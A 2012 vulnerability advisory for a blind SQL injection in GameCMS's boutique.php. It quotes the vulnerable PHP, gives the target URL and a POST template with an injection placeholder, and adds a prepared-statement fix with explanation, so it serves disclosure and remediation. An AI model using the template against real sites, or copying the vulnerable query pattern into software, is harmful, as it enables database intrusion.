
GameCMS - Blind SQL Injection

Author: The UnKnØwN, Published: 21-09-2012
+-----------------------------------------------------------------------------+
¦ GameCMS - Blind SQL Injection ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__) ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - BenzØ - Soka - Hony - Pincki - ¦
¦ Linkce16 - Mooh Splinter - The Spark - F3i ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : GameCMS - Blind SQL Injection ¦
¦ [+] date : 04-07-2012 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] software link : ¦
¦ https://rapidshare.com/#!download|3|993330299|GameCMS.rar|5514 ¦
¦ [+] version : 1 ¦
¦ [+] category : webapps ¦
¦ [+] tested on : windows xp ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ Unprotected POST variable in "/pages/boutique.php" ¦


// Excerpt from /pages/boutique.php as shipped. $row (the logged-in account's row) is set
// earlier in the original file; the closing brace of the if-block is added here for
// completeness. Both user-supplied values pass only through secu(), shown below.
if(isset($_POST['achatok']))
{
    $ip = $_SERVER['REMOTE_ADDR'];
    // $_GET['tadt'] is concatenated into an unquoted numeric position; secu() does not
    // check that it is a number.
    $sqlss = mysql_query("SELECT * FROM boutique WHERE id=".secu($_GET['tadt'])."");
    $datass = mysql_fetch_array($sqlss);
    $prix = $datass['cost'];
    $points = $row['points'];
    $ptsnow = $points - $prix;
    mysql_query('UPDATE accounts SET points="'.$ptsnow.'"WHERE account="'.$row['account'].'"');
    $date = date("d-m-Y");
    // $_POST['persoSelect'] lands inside single quotes. With its default flags (PHP before 8.1,
    // ENT_COMPAT) htmlspecialchars() leaves the single quote untouched, so secu() gives the
    // quoted value no protection. This is the Blind SQL Injection described in this advisory.
    $perso = mysql_fetch_array(mysql_query("SELECT * FROM personnages WHERE name = '".secu($_POST['persoSelect']."'")));
}

// secu() is HTML output escaping, not SQL escaping, and is no substitute for
// parameterised queries.
function secu($var)
{
    return htmlspecialchars($var);
}




URL : http://site/path/index.php?url=boutique&tadt=1
POST DATA : achatok={something}&persoSelect={Inject}
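The fix is to stop splicing request values into SQL at all. The following is an added example, not GameCMS code: the same purchase handler rewritten with mysqli prepared statements. Table and column names (boutique, accounts, personnages, cost, points, account, name) are taken from the snippet above; the mysqli handle `$db` and the account row `$row` are assumed to be set up earlier in the page, as in the original, and `get_result()` assumes the mysqlnd driver. `tadt` is validated as an integer and `persoSelect` is bound as a string, so neither value can change the shape of the query, and the points debit is done in SQL with a balance check rather than computed in PHP and written back unconditionally.

```php
<?php
declare(strict_types=1);

// Added example (not the project's code): hardened version of the boutique.php
// purchase handler. Assumes $db (mysqli) and $row (logged-in account) already exist.

/** Return the shop item for $id, or null. The id is bound as an integer. */
function fetch_item(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT * FROM boutique WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $item = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $item ?: null;
}

/** Return the character row for $name, or null. The value never touches the SQL text. */
function fetch_character(mysqli $db, string $name): ?array
{
    $stmt = $db->prepare('SELECT * FROM personnages WHERE name = ?');
    $stmt->bind_param('s', $name);
    $stmt->execute();
    $perso = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $perso ?: null;
}

/** Debit $cost points from $account; true only if the balance covered it. */
function debit_points(mysqli $db, string $account, int $cost): bool
{
    // Arithmetic and the balance check happen in one statement, so two concurrent
    // purchases cannot both read the old balance and a negative balance is refused.
    $stmt = $db->prepare(
        'UPDATE accounts SET points = points - ? WHERE account = ? AND points >= ?'
    );
    $stmt->bind_param('isi', $cost, $account, $cost);
    $stmt->execute();
    $ok = $stmt->affected_rows === 1;
    $stmt->close();
    return $ok;
}

if (isset($_POST['achatok'])) {
    // Validate the item id as an integer instead of HTML-escaping it.
    $itemId = filter_input(INPUT_GET, 'tadt', FILTER_VALIDATE_INT);
    $persoName = (string) ($_POST['persoSelect'] ?? '');

    $item = ($itemId === null || $itemId === false) ? null : fetch_item($db, $itemId);
    $perso = fetch_character($db, $persoName);

    if ($item === null || $perso === null) {
        http_response_code(400);
        exit('Unknown item or character');
    }
    if (!debit_points($db, (string) $row['account'], (int) $item['cost'])) {
        http_response_code(402);
        exit('Not enough points');
    }
    // Continue with the purchase for $perso as the original page does from here on.
}
```

If the code base must stay on the legacy mysql_* extension, the minimum is `intval()` on `tadt` and `mysql_real_escape_string()` on `persoSelect` with the value kept inside quotes; but that extension was removed in PHP 7, so migrating to prepared statements is the durable fix.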



¦ ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+
